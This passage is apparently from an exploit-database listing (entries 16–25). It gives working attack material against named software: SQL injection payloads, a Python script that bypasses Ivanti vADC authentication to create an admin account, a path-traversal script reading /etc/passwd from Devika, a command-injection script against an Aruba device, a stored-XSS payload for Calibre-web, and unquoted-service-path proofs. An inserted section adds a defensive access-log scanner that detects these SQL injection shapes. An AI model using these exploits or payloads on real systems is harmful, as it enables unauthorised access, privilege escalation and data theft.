User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: localhost
Connection: Keep-alive

cid=1*if(now()=sysdate()%2Csleep(6)%2C0)&max_price=124&minimum_range=0&sort=112

###

### Parameter & Payloads ###

Parameter: cid (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cid=1) AND 7735=7735 AND (5267=5267

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: cid=1) AND (SELECT 7626 FROM (SELECT(SLEEP(5)))yOxS) AND (8442=8442

###
  17. # Exploit Title: Ivanti vADC 9.9 - Authentication Bypass
# Date: 2024-08-03
# Exploit Author: ohnoisploited
# Vendor Homepage: https://www.ivanti.com/en-gb/products/virtual-application-delivery-controller
# Software Link: https://hubgw.docker.com/r/pulsesecure/vtm
# Version: 9.9
# Tested on: Linux
# Name Changes: Riverbed Stingray Traffic Manager -> Brocade vTM -> Pulse Secure Virtual Traffic Manager -> Ivanti vADC
# Fixed versions: 22.7R2+

```
import requests

# Set to target address
admin_portal = 'https://192.168.88.130:9090'

# User to create
new_admin_name = 'newadmin'
new_admin_password = 'newadmin1234'

requests.packages.urllib3.disable_warnings()
session = requests.Session()

# Setting 'error' bypasses access control for wizard.fcgi.
# wizard.fcgi can load any section in the web interface.
params = {
    'error': 1,
    'section': 'Access Management:LocalUsers'
}

# Create new user request
# _form_submitted to bypass CSRF
data = {
    '_form_submitted': 'form',
    'create_user': 'Create',
    'group': 'admin',
    'newusername': new_admin_name,
    'password1': new_admin_password,
    'password2': new_admin_password
}

# Post request
r = session.post(admin_portal + "/apps/zxtm/wizard.fcgi", params=params, data=data, verify=False, allow_redirects=False)

# View response
content = r.content.decode('utf-8')
print(content)

if r.status_code == 200 and '<title>2<' in content:
    print("New user request sent")
    print("Login with username '" + new_admin_name + "' and password '" + new_admin_password + "'")
else:
    print("Unable to create new user")
```
  18. # Exploit Title: Bonjour Service - 'mDNSResponder.exe' Unquoted Service Path
# Discovery by: bios
# Discovery Date: 2024-15-07
# Vendor Homepage: https://developer.apple.com/bonjour/
# Tested Version: 3,0,0,10
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Microsoft Windows 10 Home

# Step to discover Unquoted Service Path:

C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """

Bonjour Service    Bonjour Service    C:\Program Files\Blizzard\Bonjour Service\mDNSResponder.exe    Auto

C:\>systeminfo

Host Name:     DESKTOP-HFBJOBG
OS Name:       Microsoft Windows 10 Home
OS Version:    10.0.19045 N/A Build 19045

PS C:\Program Files\Blizzard\Bonjour Service> powershell -command "(Get-Command .\mDNSResponder.exe).FileVersionInfo.FileVersion"
>> 3,0,0,10

#Exploit:
There is an Unquoted Service Path in Bonjour Services (mDNSResponder.exe). This may allow an authorized local user to insert arbitrary code into the unquoted service path and escalate privileges.
  19. # Exploit Title: xhibiter nft marketplace SQLI
# Google Dork: intitle:"View - Browse, create, buy, sell, and auction NFTs"
# Date: 29/06/204
# Exploit Author: Sohel yousef - https://www.linkedin.com/in/sohel-yousef-50a905189/
# Vendor Homepage: https://elements.envato.com/xhibiter-nft-marketplace-html-template-AQN45FA
# Version: 1.10.2
# Tested on: linux
# CVE : [if applicable]

on this dir https://localhost/collections?id=2
xhibiter nft marketplace suffers from SQLI

---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2' AND 4182=4182 AND 'rNfD'='rNfD

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2' AND (SELECT 1492 FROM (SELECT(SLEEP(5)))HsLV) AND 'KEOa'='KEOa

    Type: UNION query
    Title: MySQL UNION query (NULL) - 36 columns
    Payload: id=2' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7162626271,0x655465754c50524d684f764944434458624e4e596c614b6d4a56656f495669466d4b704362666b58,0x71716a6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
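The SQL injection posts above (6, 7, 16 and 19) all use the same few payload families: a quote-break followed by a tautology and a comment trailer, a boolean tautology on its own, a SLEEP()-based timing probe, and UNION column probing. Those shapes survive in web-server access logs, which is where a defender usually meets them first. The following is an added example, not part of any of those posts: a Python scanner that parses constructed Apache-style access-log lines, percent-decodes the request target (repeatedly, so double-encoded probes are normalised too) and reports which rule each line trips. The log lines and the rule set are assumptions built from the payload shapes quoted above; POST bodies such as the `cid` parameter in post 16 do not appear in a standard access log and need request-body logging or a WAF to be seen.

```python
import re
from urllib.parse import unquote_plus

# Signature rules modelled on the payload shapes quoted in the posts above
# (tautologies, comment trailers, SLEEP() timing probes, UNION column probes).
SQLI_RULES = [
    ("tautology", re.compile(r"(?:'|\b)\s*(?:or|and)\s+(\d+|'[^']*')\s*=\s*\1", re.I)),
    ("comment-trailer", re.compile(r"--\s|#|/\*")),
    ("time-based", re.compile(r"\bsleep\s*\(\s*\d+", re.I)),
    ("union-probe", re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)),
]

# Request line inside an Apache combined-format record: "METHOD target HTTP/x.y"
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def decode_target(target, max_rounds=3):
    """Percent-decode repeatedly (bounded) so double-encoded payloads are normalised."""
    for _ in range(max_rounds):
        decoded = unquote_plus(target)
        if decoded == target:
            break
        target = decoded
    return target


def match_rules(text):
    """Names of every rule that fires on the (already decoded) text, in rule order."""
    return [name for name, rx in SQLI_RULES if rx.search(text)]


def scan_access_log(lines):
    """Return one finding per log line whose request target trips at least one rule."""
    findings = []
    for lineno, line in enumerate(lines, start=1):
        m = REQUEST_LINE.search(line)
        if not m:
            continue                       # malformed record: nothing to inspect
        decoded = decode_target(m.group("target"))
        rules = match_rules(decoded)
        if rules:
            findings.append({"line": lineno, "method": m.group("method"),
                             "target": decoded, "rules": rules})
    return findings


# Constructed sample log lines (Apache combined format); the probes follow the posts above.
SAMPLE_LOG = [
    '10.0.0.5 - - [04/Jun/2024:10:00:01 +0000] "GET /news_details.php?id=10071 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [04/Jun/2024:10:00:02 +0000] "GET /news_details.php?id=10071%20AND%204036%3D4036 HTTP/1.1" 200 5120',
    '10.0.0.5 - - [04/Jun/2024:10:00:09 +0000] "GET /collections?id=2%27%20AND%20(SELECT%201492%20FROM%20(SELECT(SLEEP(5)))HsLV)%20AND%20%27KEOa%27%3D%27KEOa HTTP/1.1" 200 3300',
    '10.0.0.5 - - [04/Jun/2024:10:00:10 +0000] "GET /collections?id=-5819%20UNION%20ALL%20SELECT%20NULL,NULL--%20- HTTP/1.1" 500 212',
    '10.0.0.5 - - [04/Jun/2024:10:00:11 +0000] "GET /lims/clientStatus.php?client_id=1511986023%27%20OR%201%3D1%20--%20a HTTP/1.1" 200 9800',
    '10.0.0.7 - - [04/Jun/2024:10:00:12 +0000] "GET /services.php?section=5081 HTTP/1.1" 200 4100',
    '10.0.0.5 - - [04/Jun/2024:10:00:13 +0000] "GET /news_details.php?id=10071%2520AND%25204036%253D4036 HTTP/1.1" 200 5120',
]

if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"line {f['line']}: {f['method']} {f['target']}  ->  {', '.join(f['rules'])}")
```

Rules this narrow are a triage aid, not a blocking control: a benign query string that happens to contain `--` followed by whitespace will also fire, so treat hits as candidates for review and pair them with the request's status code and response size, which for the time-based probe is best correlated with the request duration field if the server logs one.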
  20. # Exploit Title: SolarWinds Kiwi Syslog Server 9.6.7.1 - Unquoted Service Path
# Date: 2024-07-31
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# Vendor Homepage: https://www.kiwisyslog.com/
# Software Link: https://www.kiwisyslog.com/downloads
# Version: Software Version 9.6.7.1
# Tested on: Windows 10 Pro x64

1. Description:
SolarWinds Kiwi Syslog Server 9.6.7.1 is an affordable software to manage syslog messages, SNMP traps, and Windows event logs

2. Proof

C:\>sc qc "Kiwi Syslog Server"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Kiwi Syslog Server
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Syslogd\Syslogd_Service.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Kiwi Syslog Server
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>systeminfo

OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19045 N/A Build 19045
OS Manufacturer:           Microsoft Corporation
  21. # Exploit Title: Oracle Database 12c Release 1 - Unquoted Service Path
# Date: 2024-07-31
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# MiRROR-H: https://mirror-h.org/search/hacker/49626/
# Vendor Homepage: https://www.oracle.com/
# Software Link: https://www.oracle.com/
# Version: 12c Release 1
# Tested on: Windows 10 Pro x64

C:\>sc qc "OracleDBConsoleorcl"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: OracleDBConsoleorcl
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Oracle\product\11.2.0\dbhome_1\bin\nmesrvc.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OracleDBConsoleorcl
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\>systeminfo
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.19045 N/A Build 19045
OS Manufacturer:           Microsoft Corporation
  22. # Exploit Title: Stored XSS in Calibre-web
# Date: 07/05/2024
# Exploit Authors: Pentest-Tools.com (Catalin Iovita & Alexandru Postolache)
# Vendor Homepage: (https://github.com/janeczku/calibre-web/)
# Version: 0.6.21 - Romesa
# Tested on: Linux 5.15.0-107, Python 3.10.12, lxml 4.9.4
# CVE: CVE-2024-39123

## Vulnerability Description
Calibre-web 0.6.21 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.

## Steps to Reproduce
1. Log in to the application.
2. Upload a new book.
3. Access the Books List functionality from the `/table?data=list&sort_param=stored` endpoint.
4. In the `Comments` field, input the following payload: <a href=javas%1Bcript:alert()>Hello there!</a>
5. Save the changes.
6. Upon clicking the description on the book that was created, in the Book Details, the payload was successfully injected in the Description field. By clicking on the message, an alert box will appear, indicating the execution of the injected script.
  23. # Exploit Title: Devika v1 - Path Traversal via 'snapshot_path' Parameter
# Google Dork: N/A
# Date: 2024-06-29
# Exploit Author: Alperen Ergel
# Contact: @alpernae (IG/X)
# Vendor Homepage: https://devikaai.co/
# Software Link: https://github.com/stitionai/devika
# Version: v1
# Tested on: Windows 11 Home Edition
# CVE: CVE-2024-40422

#!/usr/bin/python
import argparse
import requests

def exploit(target_url):
    url = f'http://{target_url}/api/get-browser-snapshot'
    params = {
        'snapshot_path': '../../../../etc/passwd'
    }
    response = requests.get(url, params=params)
    print(response.text)

if __name__ == "__main__":
    parser = argparse.ArgumentParser(description='Exploit directory traversal vulnerability.')
    parser.add_argument('-t', '--target', help='Target URL (e.g., target.com)', required=True)
    args = parser.parse_args()
    exploit(args.target)
  24. #Exploit Title: Genexus Protection Server 9.7.2.10 - 'protsrvservice' Unquoted Service Path
#Exploit Author : SamAlucard
#Exploit Date: 2024-07-31
#Vendor : Genexus
#Version : Genexus Protection Server 9.7.2.10
#Software Link: https://www.genexus.com/en/developers/downloadcenter?data=;;
#Vendor Homepage : https://www.genexus.com/es/
#Tested on OS: Windows 10 Pro

#Analyze PoC :
==============

C:\>sc qc protsrvservice
[SC] QueryServiceConfig CORRECTO

NOMBRE_SERVICIO: protsrvservice
        TIPO               : 10  WIN32_OWN_PROCESS
        TIPO_INICIO        : 2   AUTO_START
        CONTROL_ERROR      : 1   NORMAL
        NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\CommonFiles\Artech\GXProt1\ProtSrv.exe
        GRUPO_ORDEN_CARGA  :
        ETIQUETA           : 0
        NOMBRE_MOSTRAR     : ProtSrvService
        DEPENDENCIAS       : RPCSS
        NOMBRE_INICIO_SERVICIO: LocalSystem
  25. # Exploit Title: Remote Command Execution | Aurba 501
# Date: 17-07-2024
# Exploit Author: Hosein Vita
# Vendor Homepage: https://www.hpe.com
# Version: Aurba 501 CN12G5W0XX
# Tested on: Linux

import requests
from requests.auth import HTTPBasicAuth

def get_input(prompt, default_value):
    user_input = input(prompt)
    return user_input if user_input else default_value

base_url = input("Enter the base URL: ")
if not base_url:
    print("Base URL is required.")
    exit(1)

username = get_input("Enter the username (default: admin): ", "admin")
password = get_input("Enter the password (default: admin): ", "admin")

login_url = f"{base_url}/login.cgi"
login_payload = {
    "username": username,
    "password": password,
    "login": "Login"
}
login_headers = {
    "Accept-Encoding": "gzip, deflate, br",
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": base_url,
    "Connection": "close"
}

session = requests.Session()
requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

# Login to the system
response = session.post(login_url, headers=login_headers, data=login_payload, verify=False)

# Check if login was successful
if response.status_code == 200 and "login failed" not in response.text.lower():
    print("Login successful!")

    # The command to be executed on the device
    command = "cat /etc/passwd"
    ping_ip = f"4.2.2.4||{command}"

    # Data to be sent in the POST request
    data = {
        "ping_ip": ping_ip,
        "ping_timeout": "1",
        "textareai": "",
        "ping_start": "Ping"
    }

    # Headers to be sent with the request
    headers = {
        "Accept-Encoding": "gzip, deflate, br",
        "Content-Type": "application/x-www-form-urlencoded",
        "Origin": base_url,
        "Referer": f"{base_url}/admin.cgi?action=ping",
        "Connection": "close"
    }

    # Sending the HTTP POST request to exploit the vulnerability
    exploit_url = f"{base_url}/admin.cgi?action=ping"
    response = session.post(exploit_url, headers=headers, data=data, verify=False)

    if any("root" in value for value in response.headers.values()):
        print("Exploit successful! The /etc/passwd file contents are reflected in the headers:")
        print(response.headers)
    else:
        print("Exploit failed. The response headers did not contain the expected output.")
else:
    print("Login failed. Please check the credentials and try again.")

# Print the response headers for further analysis
print(response.headers)